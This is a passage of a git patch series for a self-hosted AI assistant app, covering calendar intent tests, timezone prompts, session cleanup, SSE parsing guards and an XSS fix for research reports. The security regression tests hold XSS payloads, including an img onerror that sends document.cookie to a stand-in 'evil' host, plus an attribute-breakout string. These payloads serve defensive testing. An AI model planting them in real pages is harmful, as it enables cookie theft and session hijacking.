+    assert message_needs_tools("have another go at adding a test entry to the calendar")
+    assert message_needs_tools(
+        "Okay so you should be able to create that calendar event for tomorrow at 1:30 p.m. right for me to go to the hardware store"
+    )
+    assert message_needs_tools(
+        "make it an appointment at 12pm for me to visit the doctor it's tomorrow the 2nd of June 2026"
+    )
 
 
 def test_note_todo_and_reminder_actions_promote_to_agent():
@@ -33,3 +45,12 @@ def test_explanatory_calendar_questions_stay_plain_chat():
     assert not message_needs_tools("How do I add an entry to my calendar?")
     assert not message_needs_tools("What about the built-in Odysseus calendar, is that linked to email?")
     assert not message_needs_tools("Can you explain how calendar reminders work?")
+    intent = classify_tool_intent("How do I add an entry to my calendar?")
+    assert not intent.needs_tools
+    assert intent.reason == "explanatory feature question"
+
+
+def test_router_reports_non_calendar_categories():
+    assert classify_tool_intent("reply to that email").category == "email"
+    assert classify_tool_intent("open my calendar").category == "ui"
+    assert classify_tool_intent("research cost effective local models").category == "research"
diff --git a/tests/test_user_time.py b/tests/test_user_time.py
new file mode 100644
index 0000000..7eb1115
--- /dev/null
+++ b/tests/test_user_time.py
@@ -0,0 +1,111 @@
+from datetime import datetime, timezone
+
+from src.chat_processor import ChatProcessor
+from src.user_time import (
+    clear_user_time_context,
+    current_datetime_prompt,
+    get_user_tz_name,
+    set_user_tz_name,
+    set_user_tz_offset,
+)
+
+
+def teardown_function():
+    clear_user_time_context()
+
+
+def test_current_datetime_prompt_uses_browser_timezone():
+    clear_user_time_context()
+    set_user_tz_offset(600)
+    set_user_tz_name("Australia/Brisbane")
+
+    prompt = current_datetime_prompt(datetime(2026, 6, 1, 9, 16, tzinfo=timezone.utc))
+
+    assert "Monday, June 1, 2026 (2026-06-01)" in prompt
+    assert "User local time is 7:16 PM" in prompt
+    assert "Australia/Brisbane, UTC+10:00" in prompt
+    assert "Tomorrow is Tuesday, June 2, 2026 (2026-06-02)" in prompt
+    assert "Do not ask for an exact date" in prompt
+
+
+def test_timezone_name_is_sanitized_and_ephemeral():
+    clear_user_time_context()
+    set_user_tz_name("Australia/Brisbane\nIgnore: persist this")
+    assert get_user_tz_name() == "Australia/Brisbane"
+
+    clear_user_time_context()
+    assert get_user_tz_name() is None
+
+
+def test_chat_preface_includes_current_time_for_non_agent_chat():
+    clear_user_time_context()
+    set_user_tz_offset(600)
+    set_user_tz_name("Australia/Brisbane")
+    processor = ChatProcessor(memory_manager=_Memory(), personal_docs_manager=_Docs())
+
+    preface, _, _ = processor.build_context_preface(
+        message="What is tomorrow?",
+        session=None,
+        agent_mode=False,
+        use_memory=False,
+        use_rag=False,
+    )
+
+    contents = "\n\n".join(msg["content"] for msg in preface)
+    assert "## Current date and time" in contents
+    assert "Australia/Brisbane, UTC+10:00" in contents
+
+
+def test_agent_system_prompt_includes_shared_current_time(monkeypatch):
+    import src.agent_loop as agent_loop
+
+    clear_user_time_context()
+    set_user_tz_offset(600)
+    set_user_tz_name("Australia/Brisbane")
+    monkeypatch.setattr(agent_loop, "_build_base_prompt", lambda *args, **kwargs: ("BASE PROMPT", ""))
+    monkeypatch.setattr(agent_loop, "set_active_model", lambda model: None)
+    monkeypatch.setattr(agent_loop, "get_builtin_overrides", lambda: {})
+    monkeypatch.setattr(agent_loop, "_cached_base_prompt", None)
+    monkeypatch.setattr(agent_loop, "_cached_base_prompt_key", None)
+
+    messages, _ = agent_loop._build_system_prompt(
+        [],
+        model="gpt-oss-120b",
+        active_document=None,
+        mcp_mgr=None,
+    )
+
+    assert messages[0]["role"] == "system"
+    assert "## Current date and time" in messages[0]["content"]
+    assert "Australia/Brisbane, UTC+10:00" in messages[0]["content"]
+    assert "BASE PROMPT" in messages[0]["content"]
+
+
+def test_calendar_relative_time_parser_handles_dotted_pm(monkeypatch):
+    import routes.calendar_routes as calendar_routes
+
+    class FixedDateTime(datetime):
+        @classmethod
+        def now(cls, tz=None):
+            value = datetime(2026, 6, 1, 9, 16, tzinfo=timezone.utc)
+            if tz is not None:
+                return value.astimezone(tz)
+            return value.replace(tzinfo=None)
+
+    clear_user_time_context()
+    set_user_tz_offset(600)
+    set_user_tz_name("Australia/Brisbane")
+    monkeypatch.setattr(calendar_routes, "datetime", FixedDateTime)
+
+    parsed = calendar_routes.parse_due_for_user("tomorrow at 1:30 p.m")
+
+    assert parsed == "2026-06-02T13:30:00+10:00"
+
+
+class _Memory:
+    def load(self, owner=None):
+        return []
+
+
+class _Docs:
+    rag_manager = None

From 594775dc4b9de28bfa01efd4aa1344b575b6a9d7 Mon Sep 17 00:00:00 2001
From: "Massab K." <massab725@gmail.com>
Date: Thu, 4 Jun 2026 17:27:46 +0500
Subject: [PATCH 05/12] Fix issue 135 chat context bleed (#281)

* Fix issue 135 chat context bleed

* Guard task delivery metadata access
---
 routes/chat_routes.py    | 19 ++++++++++++++++++-
 routes/session_routes.py | 15 +++++++++++++--
 src/builtin_actions.py   |  7 +++++--
 src/session_actions.py   | 12 +++++++++---
 src/task_scheduler.py    | 16 ++++++++++++----
 5 files changed, 57 insertions(+), 12 deletions(-)

diff --git a/routes/chat_routes.py b/routes/chat_routes.py
index 8dd17a5..a3c6c16 100644
--- a/routes/chat_routes.py
+++ b/routes/chat_routes.py
@@ -525,7 +525,24 @@ def setup_chat_routes(
                 _doc_q = _doc_db.query(DBDocument).filter(DBDocument.id == active_doc_id)
                 active_doc = _owner_session_filter(_doc_q, ctx.user).first()
                 if active_doc:
-                    logger.info(f"[doc-inject] found by ID: title={active_doc.title!r}, lang={active_doc.language!r}, is_active={active_doc.is_active}, content_len={len(active_doc.current_content or '')}")
+                    doc_session = active_doc.session_id
+                    doc_owner = getattr(active_doc, "owner", None)
+                    if doc_owner and ctx.user and doc_owner != ctx.user:
+                        logger.warning(
+                            "[doc-inject] ignoring active_doc_id %s owned by another user",
+                            active_doc_id,
+                        )
+                        active_doc = None
+                    elif doc_session and doc_session != session:
+                        logger.warning(
+                            "[doc-inject] ignoring stale active_doc_id %s from session %s while in session %s",
+                            active_doc_id,
+                            doc_session,
+                            session,
+                        )
+                        active_doc = None
+                    else:
+                        logger.info(f"[doc-inject] found by ID: title={active_doc.title!r}, lang={active_doc.language!r}, is_active={active_doc.is_active}, content_len={len(active_doc.current_content or '')}")
                 else:
                     logger.warning(f"[doc-inject] NOT FOUND by ID {active_doc_id}")
             if not active_doc:
diff --git a/routes/session_routes.py b/routes/session_routes.py
index 58cb8ae..049635d 100644
--- a/routes/session_routes.py
+++ b/routes/session_routes.py
@@ -94,7 +94,6 @@ logger = logging.getLogger(__name__)
 
 router = APIRouter(prefix="/api", tags=["sessions"])
 
-
 def _current_user_is_admin(request: Request, user: str | None) -> bool:
     if not user:
         return False
@@ -142,6 +141,17 @@ def _persist_session_headers(session_id: str, headers: dict | None) -> None:
         db.close()
 
 
+_HIDDEN_SYSTEM_SESSION_NAMES = {
+    "[Task] Chat Sessions Tidy",
+    "[Task] Documents Tidy",
+    "[Task] Memory Tidy",
+    "[Task] Research Tidy",
+    "[Task] Email Mark Boundaries",
+    "[Task] Email Tags",
+    "[Task] Skills Audit",
+}
+
+
 def _pick_endpoint_for_sort(owner=None):
     """Pick model endpoint for auto-sort LLM call — uses utility endpoint setting, falls back to default."""
     from src.endpoint_resolver import resolve_endpoint
@@ -265,7 +275,8 @@ def setup_session_routes(session_manager: SessionManager, config: dict, webhook_
                      "message_count": msg_count_map.get(s.id, 0)}
                     for s in user_sessions.values()
                     if not s.archived
-                    and (s.name or "").strip() not in ("Nobody", "Incognito")]
+                    and (s.name or "").strip() not in ("Nobody", "Incognito")
+                    and (s.name or "").strip() not in _HIDDEN_SYSTEM_SESSION_NAMES]
 
         return sessions
     
diff --git a/src/builtin_actions.py b/src/builtin_actions.py
index 0b19e35..6b96e31 100644
--- a/src/builtin_actions.py
+++ b/src/builtin_actions.py
@@ -38,13 +38,16 @@ class TaskDeferred(BaseException):
 
 
 async def action_tidy_sessions(owner: str, **kwargs) -> Tuple[str, bool]:
-    """Delete empty/throwaway sessions for the owner. Pure heuristic —
+    """Delete empty sessions for the owner. Pure heuristic —
     the LLM folder-sort phase is skipped (user opted to keep this task
     LLM-free; sorting can be triggered manually via the Chats UI)."""
     try:
         import asyncio
         from src.session_actions import run_auto_sort
-        result = await asyncio.wait_for(run_auto_sort(owner, skip_llm=True), timeout=60)
+        result = await asyncio.wait_for(
+            run_auto_sort(owner, skip_llm=True, delete_throwaway=False),
+            timeout=60,
+        )
         return result, True
     except asyncio.TimeoutError:
         logger.error("tidy_sessions action timed out")
diff --git a/src/session_actions.py b/src/session_actions.py
index fd3e315..7f0944b 100644
--- a/src/session_actions.py
+++ b/src/session_actions.py
@@ -8,7 +8,7 @@ and the task scheduler / builtin actions system.
 import json
 import logging
 import re
-from datetime import datetime
+from datetime import datetime, timedelta
 
 logger = logging.getLogger(__name__)
 
@@ -22,9 +22,10 @@ _THROWAWAY_NAMES = {
     "ok", "lol", "bruh", "hmm", "hm", "meh",
 }
 _THROWAWAY_MAX_MESSAGES = 4
+_FRESH_EMPTY_SESSION_GRACE = timedelta(minutes=10)
 
 
-async def run_auto_sort(owner: str, skip_llm: bool = False) -> str:
+async def run_auto_sort(owner: str, skip_llm: bool = False, delete_throwaway: bool = True) -> str:
     """Run session cleanup + (optional) AI folder sort for the given owner.
 
     Args:
@@ -32,6 +33,7 @@ async def run_auto_sort(owner: str, skip_llm: bool = False) -> str:
         skip_llm: when True, do only Phase 1 (delete empty/throwaway sessions);
             skip Phase 2 (AI folder assignment). Used by the built-in daily
             background sweep so it never burns LLM tokens.
+        delete_throwaway: when False, only empty/incognito sessions are deleted.
 
     Returns a human-readable summary of what was done.
     """
@@ -53,6 +55,8 @@ async def run_auto_sort(owner: str, skip_llm: bool = False) -> str:
         for row in rows:
             if getattr(row, 'is_important', False):
                 continue
+            created_at = row.created_at or row.updated_at or datetime.utcnow()
+            is_fresh = (datetime.utcnow() - created_at) < _FRESH_EMPTY_SESSION_GRACE
             if (row.name or "").strip() == "Incognito":
                 deleted_throwaway += 1
                 db.delete(row)
@@ -64,9 +68,11 @@ async def run_auto_sort(owner: str, skip_llm: bool = False) -> str:
             should_delete = False
 
             if msg_count == 0:
+                if is_fresh:
+                    continue
                 should_delete = True
                 deleted_empty += 1
-            elif msg_count <= _THROWAWAY_MAX_MESSAGES:
+            elif delete_throwaway and msg_count <= _THROWAWAY_MAX_MESSAGES:
                 name = (row.name or "").strip().lower()
                 first_msg = db.query(DbMsg.content).filter(
                     DbMsg.session_id == row.id, DbMsg.role == "user"
diff --git a/src/task_scheduler.py b/src/task_scheduler.py
index 4384705..65fc451 100644
--- a/src/task_scheduler.py
+++ b/src/task_scheduler.py
@@ -979,10 +979,10 @@ class TaskScheduler:
             task = db.query(ScheduledTask).filter(ScheduledTask.id == task_id).first()
             if not task:
                 return True
-            task_type = task.task_type or "llm"
+            task_type = getattr(task, "task_type", "") or "llm"
             if task_type != "action":
                 return True
-            return (task.action or "") in self._MODEL_BACKED_ACTIONS
+            return (getattr(task, "action", "") or "") in self._MODEL_BACKED_ACTIONS
         finally:
             db.close()
 
@@ -992,7 +992,7 @@ class TaskScheduler:
         if "check-in" in (task.name or "").lower():
             return
         # Built-in housekeeping noise stays out of the chat.
-        if (task.action or "") in self._SILENT_ACTIONS:
+        if (getattr(task, "action", "") or "") in self._SILENT_ACTIONS:
             return
         from src.assistant_log import log_to_assistant
         log_to_assistant(
@@ -1408,6 +1408,12 @@ class TaskScheduler:
         from core.database import Session as DbSession, ChatMessage, CrewMember
 
         output = task.output_target or "session"
+        if (
+            output == "session"
+            and (getattr(task, "task_type", "") or "") == "action"
+            and (getattr(task, "action", "") or "") in self._SILENT_ACTIONS
+        ):
+            return
         if output.startswith("mcp__"):
             await self._deliver_via_mcp(output, task, result)
             return
@@ -2069,6 +2075,8 @@ class TaskScheduler:
                 # Built-in housekeeping/action jobs should not create browser
                 # task notifications; user AI/research tasks still can.
                 task.notifications_enabled = False
+                if (task.output_target or "session") == "session":
+                    task.output_target = defs.get("output_target", "none")
             seeded = []
             for action, defs in HOUSEKEEPING_DEFAULTS.items():
                 if action in existing_actions:
@@ -2099,7 +2107,7 @@ class TaskScheduler:
                     # AI/email/calendar tasks opt into a paused starting state
                     # via ship_paused so users can enable them deliberately.
                     status="paused" if ships_paused else "active",
-                    output_target="session",
+                    output_target=defs.get("output_target", "none"),
                     notifications_enabled=False,
                 )
                 db.add(task)

From fa1fe7f866a73fc8d31b78e67faa7cd76dfbeb63 Mon Sep 17 00:00:00 2001
From: Joeseph Grey <212606152+StressTestor@users.noreply.github.com>
Date: Thu, 4 Jun 2026 06:42:49 -0600
Subject: [PATCH 06/12] security: sanitize rendered research-report HTML (#364)

The visual research report is assembled from LLM output over crawled web
pages (untrusted content) and served under a relaxed `script-src
'unsafe-inline'` CSP. Two values reached that HTML without sanitization:

- `_md_to_html` rendered the report markdown via python-markdown, which
  passes raw HTML through verbatim, so `<script>` / `<img onerror>` /
  `<svg onload>` / `javascript:` links carried in crawled content ran in
  the app origin.
- `category` (from the /api/research/start request body, no enum check) was
  interpolated raw into `<body class="category-{category}">`.

Allowlist-sanitize the rendered markdown with nh3, keeping the formatting
the report emits (tables, code, details/summary, toc anchors, codehilite
classes, external-link target/rel) while dropping active content, and
html.escape the category. Adds regression tests.
---
 requirements.txt                   |  4 ++
 src/visual_report.py               | 37 ++++++++++++++++-
 tests/test_security_regressions.py | 67 ++++++++++++++++++++++++++++++
 3 files changed, 106 insertions(+), 2 deletions(-)

diff --git a/requirements.txt b/requirements.txt
index e4630d1..2c40729 100644
--- a/requirements.txt
+++ b/requirements.txt
@@ -21,6 +21,10 @@ youtube-transcript-api
 # Markdown rendering for research reports (src/visual_report.py).
 # Imported at module-top so it's a hard core dep, not optional.
 markdown
+# HTML sanitizer for rendered research reports (src/visual_report.py). Report
+# content is untrusted (LLM output over crawled pages) and report pages run
+# under a relaxed CSP, so the rendered HTML is allowlist-sanitized.
+nh3
 # Calendar .ics import/export (routes/calendar_routes.py).
 icalendar
 # Recurrence rule expansion for calendar events (routes/calendar_routes.py).
diff --git a/src/visual_report.py b/src/visual_report.py
index 70af4b2..b15c800 100644
--- a/src/visual_report.py
+++ b/src/visual_report.py
@@ -25,9 +25,27 @@ from src.research_utils import strip_thinking
 from urllib.parse import urlparse
 
 import markdown
+import nh3
 
 logger = logging.getLogger(__name__)
 
+# Tags/attributes permitted in rendered research-report HTML. Starts from nh3's
+# safe defaults (which drop <script>, inline event handlers, and javascript:
+# URLs) and adds back only the formatting the report itself emits: the
+# collapsible raw-findings block (<details>/<summary>), heading anchors for the
+# table of contents (id), codehilite classes, table alignment, and the
+# target/rel that _md_to_html puts on external links.
+_REPORT_ALLOWED_TAGS = set(nh3.ALLOWED_TAGS) | {"details", "summary"}
+_REPORT_ALLOWED_ATTRS = {k: set(v) for k, v in nh3.ALLOWED_ATTRIBUTES.items()}
+for _h in ("h1", "h2", "h3", "h4", "h5", "h6"):
+    _REPORT_ALLOWED_ATTRS.setdefault(_h, set()).add("id")
+for _t in ("span", "code", "pre", "div", "table", "td", "th"):
+    _REPORT_ALLOWED_ATTRS.setdefault(_t, set()).add("class")
+for _t in ("td", "th"):
+    _REPORT_ALLOWED_ATTRS.setdefault(_t, set()).add("align")
+_REPORT_ALLOWED_ATTRS.setdefault("a", set()).update({"href", "title", "target", "rel"})
+_REPORT_ALLOWED_ATTRS.setdefault("img", set()).update({"src", "alt", "title"})
+
 # ---------------------------------------------------------------------------
 # Helpers
 # ---------------------------------------------------------------------------
@@ -48,7 +66,14 @@ def _autolink_urls(md_text: str) -> str:
 
 
 def _md_to_html(md_text: str) -> str:
-    """Convert markdown to HTML with common extensions."""
+    """Convert markdown to HTML with common extensions.
+
+    Research-report markdown is assembled from LLM output over crawled web
+    pages (untrusted content), and report pages are served under a relaxed
+    `script-src 'unsafe-inline'` CSP. python-markdown passes raw HTML through
+    verbatim, so the rendered output is allowlist-sanitized to strip any
+    <script>/inline-event-handler/javascript: markup before it reaches the page.
+    """
     md_text = _autolink_urls(md_text)
     result = markdown.markdown(
         md_text,
@@ -64,6 +89,14 @@ def _md_to_html(md_text: str) -> str:
         r'<a target="_blank" rel="noopener noreferrer" href="\1',
         result,
     )
+    # Sanitize: report content is untrusted and the report CSP allows inline
+    # scripts, so strip active content while keeping the formatting above.
+    result = nh3.clean(
+        result,
+        tags=_REPORT_ALLOWED_TAGS,
+        attributes=_REPORT_ALLOWED_ATTRS,
+        link_rel=None,
+    )
     return result
 
 
@@ -1864,7 +1897,7 @@ def generate_visual_report(
         restore_btn_html=restore_btn_html,
         timestamp=timestamp,
         category_css=_category_css(category),
-        body_class=f"category-{category}" if category else "",
+        body_class=f"category-{html.escape(str(category))}" if category else "",
         session_id_js=json_dumps_str(session_id or ""),
         spare_images_js=_json_for_script(spare_images),
     )
diff --git a/tests/test_security_regressions.py b/tests/test_security_regressions.py
index 0792b9a..01c09a4 100644
--- a/tests/test_security_regressions.py
+++ b/tests/test_security_regressions.py
@@ -1041,3 +1041,70 @@ def test_chat_active_document_lookup_is_owner_scoped():
     assert "filter( DBDocument.id == active_doc_id, ).first()" not in flat
     assert "filter(DBDocument.id == active_doc_id).first()" not in flat
     assert "filter(DBDocument.id == _mem_id).first()" not in flat
+
+
+# ── research report HTML sanitization (visual report stored XSS) ──
+#
+# `src.visual_report._md_to_html` renders the deep-research report, whose
+# markdown is built from LLM output over crawled web pages (untrusted content).
+# python-markdown passes raw HTML through verbatim, and report pages are served
+# under a relaxed `script-src 'unsafe-inline'` CSP, so any markup surviving into
+# the report would execute in the app origin. The render must allowlist-sanitize.
+
+@pytest.mark.parametrize("payload", [
+    "<script>alert(document.domain)</script>",
+    '<img src=x onerror="fetch(\'//evil/\'+document.cookie)">',
+    "<svg onload=alert(1)>",
+    '<a href="javascript:alert(1)">x</a>',
+])
+def test_md_to_html_strips_active_content(payload):
+    from src.visual_report import _md_to_html
+
+    out = _md_to_html(f"Report body.\n\n{payload}").lower()
+
+    assert "<script" not in out
+    assert "onerror=" not in out
+    assert "onload=" not in out
+    assert "javascript:" not in out
+
+
+def test_md_to_html_preserves_normal_report_formatting():
+    from src.visual_report import _md_to_html
+
+    md = (
+        "## Findings\n\n"
+        "**bold** and a [source](https://example.com/p).\n\n"
+        "| A | B |\n|---|---|\n| 1 | 2 |\n\n"
+        "```python\ndef x():\n    return 1\n```\n\n"
+        "<details>\n<summary>Raw findings</summary>\n\ncontent\n</details>\n"
+    )
+    out = _md_to_html(md)
+
+    assert "<h2 id=" in out                          # heading + toc anchor preserved
+    assert "<table" in out and "<td" in out           # table
+    assert "<pre" in out and "<code" in out           # fenced code block
+    assert "<details" in out and "<summary" in out    # collapsible raw-findings section
+    assert 'href="https://example.com/p"' in out      # external link kept
+    assert 'rel="noopener' in out                     # ...and rel-hardened
+
+
+def test_visual_report_escapes_request_category():
+    # `category` arrives straight from the /api/research/start request body with
+    # no enum validation and lands in <body class="category-{category}"> on a
+    # report page served under `script-src 'unsafe-inline'`, so it must be escaped
+    # or it's an attribute-injection XSS independent of the markdown body.
+    from src.visual_report import generate_visual_report
+
+    html = generate_visual_report(
+        question="q",
+        report_markdown="## H\n\nbody",
+        category='"><script>alert(document.domain)</script>',
+    )
+
+    assert "<script>alert(document.domain)" not in html   # no breakout
+    assert "&lt;script&gt;" in html                        # rendered as inert text
+
+    # `category` has no type check at the request boundary, so a non-string
+    # value must coerce rather than crash the render (html.escape needs a str).
+    out = generate_visual_report(question="q", report_markdown="## H", category=12345)
+    assert "category-12345" in out

From bc9104efe2e03c1cae23139be4b52db6d6db4e59 Mon Sep 17 00:00:00 2001
From: Giuseppe <peppecastellos245@icloud.com>
Date: Thu, 4 Jun 2026 14:53:10 +0200
Subject: [PATCH 07/12] fix: SSE stream parser crashes with NoneType on
 providers sending null choice/usage/tc entries (#2389)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

* fix: SSE parser crashes with NoneType on MiniMax-M3 (and any provider sending null choice/usage/tc)

Three guards added in stream_llm:

1. choices[0] null check — MiniMax (and some other providers) send a
   choices entry as None. `_choices[0].get("delta")` raised
   AttributeError. Now checks `_choices[0] is not None` before calling
   .get().

2. usage null guard — j["usage"] can arrive as None (not a dict) on
   some providers. Added `or {}` so subsequent .get() calls don't crash.

3. tool_calls null entry skip — individual entries in the tool_calls
   array can be None. Added `if tc is None: continue` before
   tc.get("function").

All three match the `or {}` / null-guard pattern used elsewhere in the
same block. Safe for all OpenAI-compatible providers.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>

* fix: guard null choice in elif-choices SSE branch

The usage-chunk path already guarded _choices[0] is not None, but the
elif "choices" branch that processes content/tool-call deltas did not.
A chunk like {"choices": [null]} or {"choices": [null], "usage": null}
reaches j["choices"][0].get("delta") and crashes with:

    'NoneType' object has no attribute 'get'

Fix: extract choices[0] into _c0 and continue to the next chunk when
it is None, matching the guard already applied in the usage path.

Adds three focused regressions covering the paths the maintainer flagged:
- {"choices": [null]}
- {"choices": [null], "usage": null}
- tool_calls array containing a null entry alongside a valid call

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>

---------

Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
---
 src/llm_core.py                           | 11 +++--
 tests/test_llm_core_usage_finish_delta.py | 53 +++++++++++++++++++++++
 2 files changed, 61 insertions(+), 3 deletions(-)

diff --git a/src/llm_core.py b/src/llm_core.py
index be31ac5..a929edc 100644
--- a/src/llm_core.py
+++ b/src/llm_core.py
@@ -1398,7 +1398,7 @@ async def stream_llm(url: str, model: str, messages: List[Dict], temperature: fl
                                 j = json.loads(data)
                                 # Usage chunk (from stream_options)
                                 _choices = j.get("choices") or []
-                                _delta0 = _choices[0].get("delta") if _choices else None
+                                _delta0 = _choices[0].get("delta") if (_choices and _choices[0] is not None) else None
                                 # Capture usage whenever the chunk carries it and
                                 # the delta has no actual output. Some gateways /
                                 # local servers attach usage to the FINAL delta,
@@ -1412,7 +1412,7 @@ async def stream_llm(url: str, model: str, messages: List[Dict], temperature: fl
                                     or _delta0.get("tool_calls")
                                 )
                                 if "usage" in j and not _delta_has_output:
-                                    u = j["usage"]
+                                    u = j["usage"] or {}
                                     _usage_data = {"input_tokens": u.get("prompt_tokens", 0), "output_tokens": u.get("completion_tokens", 0)}
                                     # llama.cpp puts a `timings` block alongside `usage` with the
                                     # TRUE generation speed (predicted_per_second) — pure decode,
@@ -1427,7 +1427,10 @@ async def stream_llm(url: str, model: str, messages: List[Dict], temperature: fl
                                             _usage_data["prefill_tps"] = round(_tm["prompt_per_second"], 2)
                                     yield f'data: {json.dumps({"type": "usage", "data": _usage_data})}\n\n'
                                 elif "choices" in j:
-                                    delta = j["choices"][0].get("delta") or {}
+                                    _c0 = (j["choices"] or [None])[0]
+                                    if _c0 is None:
+                                        continue
+                                    delta = _c0.get("delta") or {}
                                     if isinstance(delta, dict):
                                         # Text content
                                         # Reasoning tokens (VLLM --reasoning-parser, e.g. Qwen3/DeepSeek-R1, Nemotron). vLLM 0.20.2 / NIM emit the field as `reasoning`; older builds use `reasoning_content`. Accept either.
@@ -1446,6 +1449,8 @@ async def stream_llm(url: str, model: str, messages: List[Dict], temperature: fl
                                             yield f'data: {json.dumps({"delta": content})}\n\n'
                                         # Native tool calls — accumulate across chunks
                                         for tc in delta.get("tool_calls") or []:
+                                            if tc is None:
+                                                continue
                                             func = tc.get("function") or {}
                                             raw_idx = tc.get("index")
                                             if raw_idx is None:
diff --git a/tests/test_llm_core_usage_finish_delta.py b/tests/test_llm_core_usage_finish_delta.py
index 9f28f9f..507939d 100644
--- a/tests/test_llm_core_usage_finish_delta.py
+++ b/tests/test_llm_core_usage_finish_delta.py
@@ -101,3 +101,56 @@ def test_usage_on_empty_choices_chunk_still_captured(monkeypatch):
     ]
     usage = _usage_events(_drive(monkeypatch, lines))
     assert usage and usage[-1] == {"input_tokens": 4, "output_tokens": 2}
+
+
+def test_null_choice_chunk_does_not_crash(monkeypatch):
+    # Some providers emit {"choices": [null]} as a heartbeat/keepalive chunk.
+    # The parser must silently skip it rather than crashing on None.get("delta").
+    lines = [
+        'data: ' + json.dumps({"choices": [{"delta": {"content": "Hello"}}]}),
+        'data: ' + json.dumps({"choices": [None]}),
+        'data: [DONE]',
+    ]
+    result = _drive(monkeypatch, lines)
+    assert "Hello" in result
+
+
+def test_null_choice_with_null_usage_does_not_crash(monkeypatch):
+    # Chunk with both choices:[null] and usage:null — neither field should panic.
+    lines = [
+        'data: ' + json.dumps({"choices": [{"delta": {"content": "Hi"}}]}),
+        'data: ' + json.dumps({"choices": [None], "usage": None}),
+        'data: [DONE]',
+    ]
+    result = _drive(monkeypatch, lines)
+    assert "Hi" in result
+
+
+def test_null_tool_call_in_delta_is_skipped(monkeypatch):
+    # Some providers include null entries in the tool_calls array alongside
+    # valid calls. The null entry must be skipped; the valid call must survive.
+    lines = [
+        'data: ' + json.dumps({
+            "choices": [{
+                "delta": {
+                    "tool_calls": [
+                        None,
+                        {"index": 0, "function": {"name": "get_weather", "arguments": '{"city":'}},
+                    ]
+                }
+            }]
+        }),
+        'data: ' + json.dumps({
+            "choices": [{
+                "delta": {
+                    "tool_calls": [
+                        {"index": 0, "function": {"name": "", "arguments": '"London"}'}},
+                    ]
+                }
+            }]
+        }),
+        'data: [DONE]',
+    ]
+    result = _drive(monkeypatch, lines)
+    # The stream completes without error; the valid tool call was accumulated.
+    assert result is not None

From e92719263e11c827e66457b4cecbc0a79d5aae79 Mon Sep 17 00:00:00 2001
From: Fellah Youssef <fellahyoussef010@gmail.com>
Date: Thu, 4 Jun 2026 14:02:52 +0100
Subject: [PATCH 08/12] feat(ui): allow expanding consolidated file chip
 regardless of count (#1849) (#2086)

---
 static/js/fileHandler.js | 14 +++++---------
 1 file changed, 5 insertions(+), 9 deletions(-)

diff --git a/static/js/fileHandler.js b/static/js/fileHandler.js
index 88f995c..b5d24d4 100644
--- a/static/js/fileHandler.js
+++ b/static/js/fileHandler.js
@@ -17,6 +17,10 @@ let API_BASE = '';
 let _uploadSpinners = [];
 const _previewUrls = new WeakMap();
 
+const MAX_FILES = 10;
+const MAX_VISIBLE = 3;
+let _expanded = false;
+
 function _getPreviewUrl(f) {
   if (!f) return '';
   let url = _previewUrls.get(f);
@@ -49,10 +53,6 @@ export function openPicker() {
   document.getElementById('file-input').click();
 }
 
-const MAX_VISIBLE = 3;
-const MAX_EXPAND = 6;   // beyond this, the badge stays collapsed (too many chips to preview)
-let _expanded = false;
-
 /**
  * Render the attachment strip with pending files.
  * 1-3 files: show individual chips.
@@ -80,11 +80,9 @@ export function renderAttachStrip() {
     label.className = 'thumb-collapsed-label';
     badge.appendChild(label);
     badge.title = pendingFiles.map(f => f.name || 'pasted-image').join('\n');
-    const canExpand = total <= MAX_EXPAND;
-    badge.style.cursor = canExpand ? 'pointer' : 'default';
+    badge.style.cursor = 'pointer';
     badge.addEventListener('click', (e) => {
       if (e.target.closest('.thumb-collapsed-x')) return;
-      if (!canExpand) return;   // too many files — don't expand into chips
       _expanded = true;
       renderAttachStrip();
     });
@@ -201,8 +199,6 @@ export async function uploadPending() {
   }
 }
 
-const MAX_FILES = 10;
-
 /**
  * Add files to pending list (capped at MAX_FILES)
  */

From d3e6935d62eb7a1d0f7016566127e6b4ca45f727 Mon Sep 17 00:00:00 2001
From: raf <146721410+rafdog1222@users.noreply.github.com>
Date: Thu, 4 Jun 2026 21:19:51 +0800
Subject: [PATCH 09/12] fix(tests): update search service mock to match current
 API signature (#2334)

comprehensive_web_search now called with (query, max_pages, return_sources)
and returns a tuple (_context, results). The test mock still used the old
async signature with max_results/fetch_content and returned a plain list,
causing TypeError on every run.

Fixes #2331
---
 tests/test_search_service_nondict_rows.py | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/tests/test_search_service_nondict_rows.py b/tests/test_search_service_nondict_rows.py
index 1e1b179..fc6ae3c 100644
--- a/tests/test_search_service_nondict_rows.py
+++ b/tests/test_search_service_nondict_rows.py
@@ -3,18 +3,18 @@ import asyncio
 import services.search.service as svc_mod
 from services.search.service import SearchService
 
-
 def test_search_skips_non_dict_results(monkeypatch):
     # comprehensive_web_search aggregates external provider + cache results;
     # a malformed row (string/None) made the old loop call r.get and crash,
     # losing the whole search.
-    async def fake_search(query, max_results=10, fetch_content=False):
-        return [
-            {"url": "https://a.com", "title": "A", "snippet": "x"},
+    def fake_search(query, max_pages=10, return_sources=False):
+        results = [
+            {"url": "https://a.com", "title": "A"},
             "junk-row",
             None,
-            {"url": "https://b.com", "title": "B", "snippet": "y"},
+            {"url": "https://b.com", "title": "B"},
         ]
+        return ("", results)
 
     monkeypatch.setattr(svc_mod, "comprehensive_web_search", fake_search)
     svc = SearchService()

From 93b3e108a6bf59e5de149a23dcd88f10698bd1be Mon Sep 17 00:00:00 2001
From: Wes Huber <wesleybaxterhuber@gmail.com>
Date: Thu, 4 Jun 2026 06:24:53 -0700
Subject: [PATCH 10/12] fix: re-export _SPORTS_HINT_RE from search ranking shim
 (#2273)

The compatibility re-export shim at src/search/ranking.py forgot
_SPORTS_HINT_RE, so tests importing src.search.ranking raised
AttributeError on the [src] parametrize variant.

Fixes #1995

Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
---
 src/search/ranking.py | 1 +
 1 file changed, 1 insertion(+)

diff --git a/src/search/ranking.py b/src/search/ranking.py
index 62e3869..abe9a83 100644
--- a/src/search/ranking.py
+++ b/src/search/ranking.py
@@ -7,6 +7,7 @@ parallel copy; it now re-exports so the two cannot drift out of sync again.
 
 from services.search.ranking import (  # noqa: F401
     _AGE_FORMATS,
+    _SPORTS_HINT_RE,
